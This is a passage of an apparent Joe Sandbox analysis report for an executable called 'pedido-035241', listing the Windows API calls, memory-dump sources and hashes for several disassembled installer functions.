                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                            • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                                                                                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                            • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                                                                                                                                                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                              • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                            • String ID: 9
                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                            • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                            • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                                                                                                                                            • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                                                                                                                                                            Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                            • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                            • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 589700163-4010320282
                                                                                                                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                            • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                            • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                                                                                                                                            Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404E41
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404E5B
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                            • String ID: f
                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                            • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                                                                                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                            • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                                                                                                                                                            Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                            • MulDiv.KERNEL32(0010A87B,00000064,?), ref: 00402FDC
                                                                                                                                                                            • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                            Strings
                                                                                                                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                            • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                            • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                                                                                                                                                            • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                                                                                                                                            • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                                                                                                                                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                            • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                            • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                            • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                                                                                                                                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                            • Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                            • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                                                                                                                                            • Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                            • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                                                                                                                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                                                                                                                                            • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2584051700-0
                                                                                                                                                                            • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                            • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                            • String ID: !
                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                            • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                            • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                            • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                            Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                            • wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                            • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                            • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
